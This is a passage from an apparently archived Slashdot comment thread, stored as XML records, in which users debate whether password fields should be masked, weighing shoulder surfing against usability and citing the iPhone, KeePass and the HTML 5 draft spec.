<tokenext>Thing is that it 's trivial for most people to shoulder surf a password .
It takes significantly more skill for someone to install a keylogger , tap cables , whatever .
A coworker that has a beef with someone else could easily shoulder-surf a Facebook password , log in on their own time and cause all kinds of mischief without much technical knowledge .
It 's not stealing money , but that 's the kind of thing that affects people a lot .</tokentext>
<sentencetext>Thing is that it's trivial for most people to shoulder surf a password.
It takes significantly more skill for someone to install a keylogger, tap cables, whatever.
A coworker that has a beef with someone else could easily shoulder-surf a Facebook password, log in on their own time and cause all kinds of mischief without much technical knowledge.
It's not stealing money, but that's the kind of thing that affects people a lot.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28477855</id>
	<title>A moron</title>
	<author>Anonymous</author>
	<datestamp>1245954780000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>That defines a moron I guess.Next he will need a autofill of his password instead as soon as he enters his login. Talk about usability to a Moron.</p></htmltext>
<tokenext>That defines a moron I guess.Next he will need a autofill of his password instead as soon as he enters his login .
Talk about usability to a Moron .</tokentext>
<sentencetext>That defines a moron I guess.Next he will need a autofill of his password instead as soon as he enters his login.
Talk about usability to a Moron.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476933</id>
	<title>Re:Making my point with humor</title>
	<author>Anonymous</author>
	<datestamp>1245947220000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext><blockquote><div><blockquote><div><p>According to the current (25th June 2009) draft of the HTML 5 spec:</p></div></blockquote><p>"The user agent should obscure the value so that people other than the user cannot see it."</p></div></blockquote><p>But if you read that carefully, you'll note that it does <b>not</b> say that the user can see it.  It allows for implementations that totally obscure the password, and implementations that let the user see the password (as long as others can't).  And it doesn't suggest how the latter might be done.</p><p>I think it was very carefully worded.  Or maybe it was just an accident.</p></div>
	</htmltext>
<tokenext>According to the current ( 25th June 2009 ) draft of the HTML 5 spec : " The user agent should obscure the value so that people other than the user can not see it .
" But if you read that carefully , you 'll note that it does not say that the user can see it .
It allows for implementations that totally obscure the password , and implementations that let the user see the password ( as long as others ca n't ) .
And it does n't suggest how the latter might be done.I think it was very carefully worded .
Or maybe it was just an accident .</tokentext>
<sentencetext>According to the current (25th June 2009) draft of the HTML 5 spec:"The user agent should obscure the value so that people other than the user cannot see it.
"But if you read that carefully, you'll note that it does not say that the user can see it.
It allows for implementations that totally obscure the password, and implementations that let the user see the password (as long as others can't).
And it doesn't suggest how the latter might be done.I think it was very carefully worded.
Or maybe it was just an accident.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473159</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471389</id>
	<title>Keypass got it right - allow user control</title>
	<author>CCW</author>
	<datestamp>1245921420000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I like how it's done in keyPass - be default all passwords are masked, but you can use a button adjacent to the password box to turn off masking.</p><p>I think 8-10 character passwords should be masked to eliminate shoulder surfing issues, but who was the idiot in the Microsoft networking UI team that thought that WPA keys were passwords and decided they needed to be masked?  That's just nonsense.   Encryption keys are not passwords.   They should be long and shoulder surfing is not an issue because you only enter them once.  Every time I connect to a wireless network with windows I curse that idiot...  I'm sure I'm not the only one.</p></htmltext>
<tokenext>I like how it 's done in keyPass - be default all passwords are masked , but you can use a button adjacent to the password box to turn off masking.I think 8-10 character passwords should be masked to eliminate shoulder surfing issues , but who was the idiot in the Microsoft networking UI team that thought that WPA keys were passwords and decided they needed to be masked ?
That 's just nonsense .
Encryption keys are not passwords .
They should be long and shoulder surfing is not an issue because you only enter them once .
Every time I connect to a wireless network with windows I curse that idiot... I 'm sure I 'm not the only one .</tokentext>
<sentencetext>I like how it's done in keyPass - be default all passwords are masked, but you can use a button adjacent to the password box to turn off masking.I think 8-10 character passwords should be masked to eliminate shoulder surfing issues, but who was the idiot in the Microsoft networking UI team that thought that WPA keys were passwords and decided they needed to be masked?
That's just nonsense.
Encryption keys are not passwords.
They should be long and shoulder surfing is not an issue because you only enter them once.
Every time I connect to a wireless network with windows I curse that idiot...  I'm sure I'm not the only one.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472357</id>
	<title>Re:Runaway security</title>
	<author>jwietelmann</author>
	<datestamp>1245924300000</datestamp>
	<modclass>Insightful</modclass>
	<modscore>2</modscore>
	<htmltext>Don't direct your ire toward information security just because your particular sysadmin happens to be an idiot.</htmltext>
<tokenext>Do n't direct your ire toward information security just because your particular sysadmin happens to be an idiot .</tokentext>
<sentencetext>Don't direct your ire toward information security just because your particular sysadmin happens to be an idiot.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471327</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471259</id>
	<title>Re:Two words</title>
	<author>Anonymous</author>
	<datestamp>1245921000000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Tried doing this before?  Much harder to not only see what someone is typing but then remembering it is harder too because it's not yet displayed in text</p></htmltext>
<tokenext>Tried doing this before ?
Much harder to not only see what someone is typing but then remembering it is harder too because it 's not yet displayed in text</tokentext>
<sentencetext>Tried doing this before?
Much harder to not only see what someone is typing but then remembering it is harder too because it's not yet displayed in text</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470999</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471627</id>
	<title>Great idea</title>
	<author>sepelester</author>
	<datestamp>1245922200000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>I wouldn't suspect my roomie of peeking over my shoulder when I type in a password.

HAHAHA DISREGARD THAT, I SUCK COCKS</htmltext>
<tokenext>I would n't suspect my roomie of peeking over my shoulder when I type in a password .
HAHAHA DISREGARD THAT , I SUCK COCKS</tokentext>
<sentencetext>I wouldn't suspect my roomie of peeking over my shoulder when I type in a password.
HAHAHA DISREGARD THAT, I SUCK COCKS</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473159</id>
	<title>Re:Making my point with humor</title>
	<author>gdshaw</author>
	<datestamp>1245927360000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>5</modscore>
	<htmltext><p>Actually, the comment is (perhaps unintentionally) insightful.  According to the current (25th June 2009) draft of the HTML 5 spec:</p><blockquote><div><p>"The user agent should obscure the value so that people other than the user cannot see it."</p></div></blockquote></div>
	</htmltext>
<tokenext>Actually , the comment is ( perhaps unintentionally ) insightful .
According to the current ( 25th June 2009 ) draft of the HTML 5 spec : " The user agent should obscure the value so that people other than the user can not see it .
"</tokentext>
<sentencetext>Actually, the comment is (perhaps unintentionally) insightful.
According to the current (25th June 2009) draft of the HTML 5 spec:"The user agent should obscure the value so that people other than the user cannot see it.
"
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471255</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472101</id>
	<title>Re:Security</title>
	<author>Lord Ender</author>
	<datestamp>1245923460000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Your "physically secured" den is still vulnerable to XSRF vulnerabilities. Of course, there are better ways to protect against this than 10-minute timeouts. But still, it reduces the risk. There is a lot more to infosec than most people (even "computer experts") realize. Infosec is its own field because it is incredibly large and complex.</p></htmltext>
<tokenext>Your " physically secured " den is still vulnerable to XSRF vulnerabilities .
Of course , there are better ways to protect against this than 10-minute timeouts .
But still , it reduces the risk .
There is a lot more to infosec than most people ( even " computer experts " ) realize .
Infosec is its own field because it is incredibly large and complex .</tokentext>
<sentencetext>Your "physically secured" den is still vulnerable to XSRF vulnerabilities.
Of course, there are better ways to protect against this than 10-minute timeouts.
But still, it reduces the risk.
There is a lot more to infosec than most people (even "computer experts") realize.
Infosec is its own field because it is incredibly large and complex.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471093</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478967</id>
	<title>And the answer is ...</title>
	<author>Tribbin</author>
	<datestamp>1246007580000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Public key authentication</p><p>Oh how the world could be with broader support. Imagine logging in on all your web-based application with no password.</p></htmltext>
<tokenext>Public key authenticationOh how the world could be with broader support .
Imagine logging in on all your web-based application with no password .</tokentext>
<sentencetext>Public key authenticationOh how the world could be with broader support.
Imagine logging in on all your web-based application with no password.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470909</id>
	<title>Not to fanboi all over the place...</title>
	<author>Anonymous</author>
	<datestamp>1245963120000</datestamp>
	<modclass>Interestin</modclass>
	<modscore>1</modscore>
	<htmltext>...but the iPhone has a good compromise: as you type in your iTunes password, the letter you just typed in gets bulleted.  This is especially important for those of us who have trouble with typos on a regular keyboard, never mind the phone's.</htmltext>
<tokenext>...but the iPhone has a good compromise : as you type in your iTunes password , the letter you just typed in gets bulleted .
This is especially important for those of us who have trouble with typos on a regular keyboard , never mind the phone 's .</tokentext>
<sentencetext>...but the iPhone has a good compromise: as you type in your iTunes password, the letter you just typed in gets bulleted.
This is especially important for those of us who have trouble with typos on a regular keyboard, never mind the phone's.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28489637</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1246018680000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I agree.  If a business (or you in your home for that matter) were really afraid of shoulder surfing, you'd be using physical tokens with PINs.  Smartcards or those RSA devices VPNs often use.</p><p>In a business or home environment, your "attackers" have more than enough plausible excuses to attempt shoulder surfing your keyboard password entry.  Password/pin hiding might be a beneficial addition to physical tokens or in public places.  Personally, I don't know how anyone could feel safe from shoulder surfing even key presses in public places.  Just makes it a leeeetle bit more inconvenient.</p></htmltext>
<tokenext>I agree .
If a business ( or you in your home for that matter ) were really afraid of shoulder surfing , you 'd be using physical tokens with PINs .
Smartcards or those RSA devices VPNs often use.In a business or home environment , your " attackers " have more than enough plausible excuses to attempt shoulder surfing your keyboard password entry .
Password/pin hiding might be a beneficial addition to physical tokens or in public places .
Personally , I do n't know how anyone could feel safe from shoulder surfing even key presses in public places .
Just makes it a leeeetle bit more inconvenient .</tokentext>
<sentencetext>I agree.
If a business (or you in your home for that matter) were really afraid of shoulder surfing, you'd be using physical tokens with PINs.
Smartcards or those RSA devices VPNs often use.In a business or home environment, your "attackers" have more than enough plausible excuses to attempt shoulder surfing your keyboard password entry.
Password/pin hiding might be a beneficial addition to physical tokens or in public places.
Personally, I don't know how anyone could feel safe from shoulder surfing even key presses in public places.
Just makes it a leeeetle bit more inconvenient.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471313</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28472457</id>
	<title>Shameless plug</title>
	<author>mordejai</author>
	<datestamp>1245924720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>I wrote about that option when I first read Nielsen's article: <a href="http://live2dev.blogspot.com/2009/06/should-we-stop-masking-passwords.html" title="blogspot.com" rel="nofollow">http://live2dev.blogspot.com/2009/06/should-we-stop-masking-passwords.html</a> [blogspot.com]</p></htmltext>
<tokenext>I wrote about that option when I first read Nielsen 's article : http : //live2dev.blogspot.com/2009/06/should-we-stop-masking-passwords.html [ blogspot.com ]</tokentext>
<sentencetext>I wrote about that option when I first read Nielsen's article: http://live2dev.blogspot.com/2009/06/should-we-stop-masking-passwords.html [blogspot.com]</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471013</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28473097</id>
	<title>Re:Masking passwords doesn't do much</title>
	<author>Anonymous</author>
	<datestamp>1245927120000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>I agree, it is a valuable deterrent against "attacks of opportunity".</p><p>That's what you meant, right?  'Cause, I'm honestly less worried about the CIA, than some co-worker's idea of a "joke" or that guy that happened to walk behind me at the coffee shop just while I was logging on.</p></htmltext>
<tokenext>I agree , it is a valuable deterrent against " attacks of opportunity " .That 's what you meant , right ?
'Cause , I 'm honestly less worried about the CIA , than some co-worker 's idea of a " joke " or that guy that happened to walk behind me at the coffee shop just while I was logging on .</tokentext>
<sentencetext>I agree, it is a valuable deterrent against "attacks of opportunity".That's what you meant, right?
'Cause, I'm honestly less worried about the CIA, than some co-worker's idea of a "joke" or that guy that happened to walk behind me at the coffee shop just while I was logging on.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471057</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480147</id>
	<title>Re:hunter2</title>
	<author>Anonymous</author>
	<datestamp>1246020840000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>"If Stephen Hawking says something about physics, do you require a citation from him? Nielson is recognized as one of the leading experts in his field."</p><p>Errm... people did.</p><p>http://www.theory.caltech.edu/~preskill/jp\_24jul04.html</p></htmltext>
<tokenext>" If Stephen Hawking says something about physics , do you require a citation from him ?
Nielson is recognized as one of the leading experts in his field. " Errm.. .
people did.http : //www.theory.caltech.edu/ ~ preskill/jp \ _24jul04.html</tokentext>
<sentencetext>"If Stephen Hawking says something about physics, do you require a citation from him?
Nielson is recognized as one of the leading experts in his field."Errm...
people did.http://www.theory.caltech.edu/~preskill/jp\_24jul04.html</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471283</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476061</id>
	<title>WTF! The world has gone mad...</title>
	<author>Anonymous</author>
	<datestamp>1245940740000</datestamp>
	<modclass>None</modclass>
	<modscore>0</modscore>
	<htmltext><p>Michael Jackson dies and the major networks devote 2 unscheduled hours to his 'life and times'...<br>People are seriously considering echoing passwords on the screen in the clear...</p><p>What's next? Dogs living with cats? Giant marshmallow men rampaging through NYC?</p><p>Seriously, I can't believe anyone is discussing this idea.</p></htmltext>
<tokenext>Michael Jackson dies and the major networks devote 2 unscheduled hours to his 'life and times'...People are seriously considering echoing passwords on the screen in the clear...What 's next ?
Dogs living with cats ?
Giant marshmallow men rampaging through NYC ? Seriously , I ca n't believe anyone is discussing this idea .</tokentext>
<sentencetext>Michael Jackson dies and the major networks devote 2 unscheduled hours to his 'life and times'...People are seriously considering echoing passwords on the screen in the clear...What's next?
Dogs living with cats?
Giant marshmallow men rampaging through NYC?Seriously, I can't believe anyone is discussing this idea.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475623</id>
	<title>Re:Indeed lack of imagination</title>
	<author>RedWizzard</author>
	<datestamp>1245938280000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p><div class="quote"><p>1) If I look outside my office window, I can see about 48 office windows (without standing up) and all of them have the lights on and it's dusk outside. Give me a dSLR and a decent set of long distance lenses and I'll prove you wrong.</p></div><p>This could be a problem but usually isn't. Since the software designer/developer doesn't know if it's a problem and the user does why not leave it up to the user? Give them a checkbox to enable masking.</p><p><div class="quote"><p>2) How many times have you typed in your password while somebody was looking at your screen eg. to show somebody something on a protected website. This happens a lot to tech people as we have to authenticate to solve an issue while somebody is standing next to me waiting for me to fix it.</p></div><p>Solved by a checkbox to enable masking.</p><p><div class="quote"><p>3) How many times have you given a presentation where your screen view (but not your keyboard input) goes worldwide (eg. teleconference) or over a set of wires that you know haven't been tampered with (conference room) - again, logging in to your webmail or so to find a copy of your presentation.</p></div><p>Solved by a checkbox to enable masking.</p><p><div class="quote"><p>4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well. Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights. This is true for Windows, Mac and (depending on your GUI) Linux</p></div><p>It's not that much more difficult to create a keyboard logger. If someone has gotten software onto your machine (user space or kernel space) you have no security at all.</p></div>
	</htmltext>
<tokenext>1 ) If I look outside my office window , I can see about 48 office windows ( without standing up ) and all of them have the lights on and it 's dusk outside .
Give me a dSLR and a decent set of long distance lenses and I 'll prove you wrong.This could be a problem but usually is n't .
Since the software designer/developer does n't know if it 's a problem and the user does why not leave it up to the user ?
Give them a checkbox to enable masking.2 ) How many times have you typed in your password while somebody was looking at your screen eg .
to show somebody something on a protected website .
This happens a lot to tech people as we have to authenticate to solve an issue while somebody is standing next to me waiting for me to fix it.Solved by a checkbox to enable masking.3 ) How many times have you given a presentation where your screen view ( but not your keyboard input ) goes worldwide ( eg .
teleconference ) or over a set of wires that you know have n't been tampered with ( conference room ) - again , logging in to your webmail or so to find a copy of your presentation.Solved by a checkbox to enable masking.4 ) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well .
Answer : the first can be done in userspace ( and in the hands of an experienced script kiddie would be unnoticed ) , the latter usually has to go as a request to a driver , kernel or other layer that requires admin rights .
This is true for Windows , Mac and ( depending on your GUI ) LinuxIt 's not that much more difficult to create a keyboard logger .
If someone has gotten software onto your machine ( user space or kernel space ) you have no security at all .</tokentext>
<sentencetext>1) If I look outside my office window, I can see about 48 office windows (without standing up) and all of them have the lights on and it's dusk outside.
Give me a dSLR and a decent set of long distance lenses and I'll prove you wrong.This could be a problem but usually isn't.
Since the software designer/developer doesn't know if it's a problem and the user does why not leave it up to the user?
Give them a checkbox to enable masking.2) How many times have you typed in your password while somebody was looking at your screen eg.
to show somebody something on a protected website.
This happens a lot to tech people as we have to authenticate to solve an issue while somebody is standing next to me waiting for me to fix it.Solved by a checkbox to enable masking.3) How many times have you given a presentation where your screen view (but not your keyboard input) goes worldwide (eg.
teleconference) or over a set of wires that you know haven't been tampered with (conference room) - again, logging in to your webmail or so to find a copy of your presentation.Solved by a checkbox to enable masking.4) How difficult is it to create a script that takes screenshots - how difficult is it to create a script that captures keyboard entry as well.
Answer: the first can be done in userspace (and in the hands of an experienced script kiddie would be unnoticed), the latter usually has to go as a request to a driver, kernel or other layer that requires admin rights.
This is true for Windows, Mac and (depending on your GUI) LinuxIt's not that much more difficult to create a keyboard logger.
If someone has gotten software onto your machine (user space or kernel space) you have no security at all.
	</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471099</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471129</id>
	<title>Hidden department revealed!</title>
	<author>gcnaddict</author>
	<datestamp>1245920580000</datestamp>
	<modclass>Informativ</modclass>
	<modscore>2</modscore>
	<htmltext>*****-****-**-********
<br>Don't\_mask\_my\_password<br> <br>(I used my stealthy password exposer to find that out.)</htmltext>
<tokenext>* * * * * - * * * * - * * - * * * * * * * * Do n't \ _mask \ _my \ _password ( I used my stealthy password exposer to find that out .
)</tokentext>
<sentencetext>*****-****-**-********
Don't\_mask\_my\_password (I used my stealthy password exposer to find that out.
)</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471643</id>
	<title>Some middle ground maybe?</title>
	<author>Wrath0fb0b</author>
	<datestamp>1245922200000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Just a random thought, on many mobile devices (where missed key-presses are more common), the screen shows only the least character pressed (e.g. h, *u **n,<nobr> <wbr></nobr>...) . This makes shoulder surfing much harder but also give feedback to the user about whether he's doing it right. Also, no, backspace does not reveal the previous letter -- once it's masked it never comes back.</p><p>If you wanted to be even more hardcore, mask the last letter (or, if you are into the whole UNIX paradigm, don't echo it back, but you should be using keys for SSH anyway) after 2 seconds or the next keypress.</p></htmltext>
<tokenext>Just a random thought , on many mobile devices ( where missed key-presses are more common ) , the screen shows only the least character pressed ( e.g .
h , * u * * n , ... ) .
This makes shoulder surfing much harder but also give feedback to the user about whether he 's doing it right .
Also , no , backspace does not reveal the previous letter -- once it 's masked it never comes back.If you wanted to be even more hardcore , mask the last letter ( or , if you are into the whole UNIX paradigm , do n't echo it back , but you should be using keys for SSH anyway ) after 2 seconds or the next keypress .</tokentext>
<sentencetext>Just a random thought, on many mobile devices (where missed key-presses are more common), the screen shows only the least character pressed (e.g.
h, *u **n, ...) .
This makes shoulder surfing much harder but also give feedback to the user about whether he's doing it right.
Also, no, backspace does not reveal the previous letter -- once it's masked it never comes back.If you wanted to be even more hardcore, mask the last letter (or, if you are into the whole UNIX paradigm, don't echo it back, but you should be using keys for SSH anyway) after 2 seconds or the next keypress.</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471913</id>
	<title>Re:Two words</title>
	<author>selven</author>
	<datestamp>1245923040000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>And since you can usually type your password 3-5 times faster than anything else because you use it so much it's often too fast even if someone's staring at your keyboard.</htmltext>
<tokenext>And since you can usually type your password 3-5 times faster than anything else because you use it so much it 's often too fast even if someone 's staring at your keyboard .</tokentext>
<sentencetext>And since you can usually type your password 3-5 times faster than anything else because you use it so much it's often too fast even if someone's staring at your keyboard.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471193</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471497</id>
	<title>Passwords are Ungood</title>
	<author>sesshomaru</author>
	<datestamp>1245921720000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Well, passwords alone are ungood...</p><p>Story Time:  Back in the Nineties I worked for a<nobr> <wbr></nobr>.com that was planning to provide a total network solution for Doctors, Clinics and Hospitals.</p><p>Because of the liabilities associated with medical records we were looking at token based security.  Basically an electronic key that a computer could read to allow access to the network.  Now the idea was that this would be available from anywhere, so the main problem was they we'd have to give away readers along with the tokens.</p><p>Flash forward to today.  The only things that should have password protection <i>only</i> are things where we don't really care about security.  Oh, and FYI, any website that asks "What is your grammar school name?" are disqualified from having decent password security.  (Even if they Email your password, how do they know you aren't logging into the Littlest Petshop's Web Board, while standing over your victim's corpse and his open Webmail connection?  Well?)</p><p>Meanwhile, we have the perfect token reader in the form of USB ports, but I don't know anyone who uses them for that.</p><p>I see peoples' passwords constantly.  Here are some popular ones:</p><p>Wife's Name<br>Kid's Name<br>Sports Team</p><p>Sometimes they mix it up with something really secure, like the current year.  I don't blame people though, I'm paranoid that people will guess my passwords even though I create the important ones by <em>rolling dice</em>...</p></htmltext>
<tokenext>Well , passwords alone are ungood...Story Time : Back in the Nineties I worked for a .com that was planning to provide a total network solution for Doctors , Clinics and Hospitals.Because of the liabilities associated with medical records we were looking at token based security .
Basically an electronic key that a computer could read to allow access to the network .
Now the idea was that this would be available from anywhere , so the main problem was they we 'd have to give away readers along with the tokens.Flash forward to today .
The only things that should have password protection only are things where we do n't really care about security .
Oh , and FYI , any website that asks " What is your grammar school name ?
" are disqualified from having decent password security .
( Even if they Email your password , how do they know you are n't logging into the Littlest Petshop 's Web Board , while standing over your victim 's corpse and his open Webmail connection ?
Well ? ) Meanwhile , we have the perfect token reader in the form of USB ports , but I do n't know anyone who uses them for that.I see peoples ' passwords constantly .
Here are some popular ones : Wife 's NameKid 's NameSports TeamSometimes they mix it up with something really secure , like the current year .
I do n't blame people though , I 'm paranoid that people will guess my passwords even though I create the important ones by rolling dice.. .</tokentext>
<sentencetext>Well, passwords alone are ungood...Story Time:  Back in the Nineties I worked for a .com that was planning to provide a total network solution for Doctors, Clinics and Hospitals.Because of the liabilities associated with medical records we were looking at token based security.
Basically an electronic key that a computer could read to allow access to the network.
Now the idea was that this would be available from anywhere, so the main problem was they we'd have to give away readers along with the tokens.Flash forward to today.
The only things that should have password protection only are things where we don't really care about security.
Oh, and FYI, any website that asks "What is your grammar school name?
" are disqualified from having decent password security.
(Even if they Email your password, how do they know you aren't logging into the Littlest Petshop's Web Board, while standing over your victim's corpse and his open Webmail connection?
Well?)Meanwhile, we have the perfect token reader in the form of USB ports, but I don't know anyone who uses them for that.I see peoples' passwords constantly.
Here are some popular ones:Wife's NameKid's NameSports TeamSometimes they mix it up with something really secure, like the current year.
I don't blame people though, I'm paranoid that people will guess my passwords even though I create the important ones by rolling dice...</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28480011</id>
	<title>Re:Making my point with humor</title>
	<author>Wiseman1024</author>
	<datestamp>1246019160000</datestamp>
	<modclass>None</modclass>
	<modscore>-1</modscore>
	<htmltext><p>People don't know about it, but I've been secretly fixing this issue by making all my passwords a series of asterisks. This way I'm password-obscuring-agnostic. The actual password is the number of asterisks it has.</p></htmltext>
<tokenext>People do n't know about it , but I 've been secretly fixing this issue by making all my passwords a series of asterisks .
This way I 'm password-obscuring-agnostic .
The actual password is the number of asterisks it has .</tokentext>
<sentencetext>People don't know about it, but I've been secretly fixing this issue by making all my passwords a series of asterisks.
This way I'm password-obscuring-agnostic.
The actual password is the number of asterisks it has.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471255</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28476437</id>
	<title>Re:hunter2</title>
	<author>Kingrames</author>
	<datestamp>1245943380000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext>Who's to say their reasoning is sound? <br>
Back seat physicists, all of 'em.</htmltext>
<tokenext>Who 's to say their reasoning is sound ?
Back seat physicists , all of 'em .</tokentext>
<sentencetext>Who's to say their reasoning is sound?
Back seat physicists, all of 'em.</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471605</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28470925</id>
	<title>the iPhone does it right...</title>
	<author>Anonymous</author>
	<datestamp>1245963120000</datestamp>
	<modclass>Redundant</modclass>
	<modscore>-1</modscore>
	<htmltext><p>The iPhone password input doesn't mask the most recent inputed character in a password dialog, but masks all the older ones and masks the input one after 2-3 seconds.</p><p>Thus you get the masking mostly, but the feedback to prevent errors (which are considerably more annoying on the iPhone/iPod touch keyboard arrangement when typing blind).</p></htmltext>
<tokenext>The iPhone password input does n't mask the most recent inputed character in a password dialog , but masks all the older ones and masks the input one after 2-3 seconds.Thus you get the masking mostly , but the feedback to prevent errors ( which are considerably more annoying on the iPhone/iPod touch keyboard arrangement when typing blind ) .</tokentext>
<sentencetext>The iPhone password input doesn't mask the most recent inputed character in a password dialog, but masks all the older ones and masks the input one after 2-3 seconds.Thus you get the masking mostly, but the feedback to prevent errors (which are considerably more annoying on the iPhone/iPod touch keyboard arrangement when typing blind).</sentencetext>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28478881</id>
	<title>Re:hunter2</title>
	<author>Engeekneer</author>
	<datestamp>1246006980000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>But Stephen Hawking would probably be correct though, psychology is just applied physics (via a few steps) after all. Now I'd like to hear what a real mathematician would have to say about it.</p><p>

<a href="http://xkcd.com/435/" title="xkcd.com" rel="nofollow">http://xkcd.com/435/</a> [xkcd.com]</p></htmltext>
<tokenext>But Stephen Hawking would probably be correct though , psychology is just applied physics ( via a few steps ) after all .
Now I 'd like to hear what a real mathematician would have to say about it .
http : //xkcd.com/435/ [ xkcd.com ]</tokentext>
<sentencetext>But Stephen Hawking would probably be correct though, psychology is just applied physics (via a few steps) after all.
Now I'd like to hear what a real mathematician would have to say about it.
http://xkcd.com/435/ [xkcd.com]</sentencetext>
	<parent>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28471589</parent>
</comment>
<comment>
	<id>http://www.semanticweb.org/ontologies/ConversationInstances.owl#comment09_06_25_1856214.28475191</id>
	<title>Please type your e-mail address again to confirm</title>
	<author>swilver</author>
	<datestamp>1245935820000</datestamp>
	<modclass>None</modclass>
	<modscore>1</modscore>
	<htmltext><p>Let's please also abolish stupid websites asking for my e-mail address twice (plainly visible in both cases) to "confirm" it.  I absolutely donot see the point as all I end up doing is copy pasting the first version.</p></htmltext>
<tokenext>Let 's please also abolish stupid websites asking for my e-mail address twice ( plainly visible in both cases ) to " confirm " it .
